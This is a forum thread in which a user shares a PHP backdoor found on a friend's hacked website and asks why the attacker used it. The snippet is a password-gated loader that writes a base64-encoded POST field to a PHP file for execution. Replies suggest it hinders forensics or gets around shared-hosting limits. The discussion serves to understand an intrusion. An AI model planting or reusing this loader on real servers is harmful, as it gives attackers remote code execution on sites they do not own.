May 9, 2021

PHP malicious code – Why does he do it like that?

Home Forums PHP malicious code – Why does he do it like that?

This topic contains 1 reply, has 2 voices, and was last updated by  sanityvampire 3 weeks, 3 days ago.

  • Author
  • #383335


    A friend’s website was ‘hacked’ and his webhosting provider then temporarily blocked the webhosting contract and made the data available to him. He then found this suspicious code snippet:

    if(isset($_POST[‘lt’]) && md5($_POST[‘lt’]) == base64_decode(“MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=”) ) {
    $lt = base64_decode($_POST[‘a’]);
    file_put_contents(‘lte_’,'<?php ‘.$lt);
    Small sidenote:
    base64_decode(“MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=”) = 023258bbeb7ce955a690dca056be885d

    Now it is quite obvious how the code actually works, as it will write the ‘a’ field of the post request (if the versioning is correct) into a file which is then executed and deleted afterwards.


    Now I am wondering why he had to go through such a ‘complicated’ way to execute his code on the server? Wouldn’t it be easier to simply directly put the code onto the server and then execute it (cli or as borwser request)? As he was able to create this file he actually should should already have gained access to the webserver directory somehow. I can only explain this by a possible lack of authorisation, is this the reason or are there other reasons?

  • #383336


    I’d say it’s to make forensics harder. Suppose the attacker wants to, I dunno, exfiltrate some information back to an HTTP server they control. If they put their actual payload here, you’d be able to see what data they sent and which server they sent it to. With this approach, all you see is this loader, which gives the attacker RCE (with auth!) but doesn’t tell you anything else about the attack.

  • #383337


    I think it’s because of the limited abilities self-created files have. This was likely created from an infected/vulnerable plugin, to which WordPress can limit directory access.

    Essentially the hacker knows most cheap shared hosts use WordPress and limit what those files can do. So they use very “lightweight” logic to exploit and use the server maliciously.

You must be logged in to reply to this topic.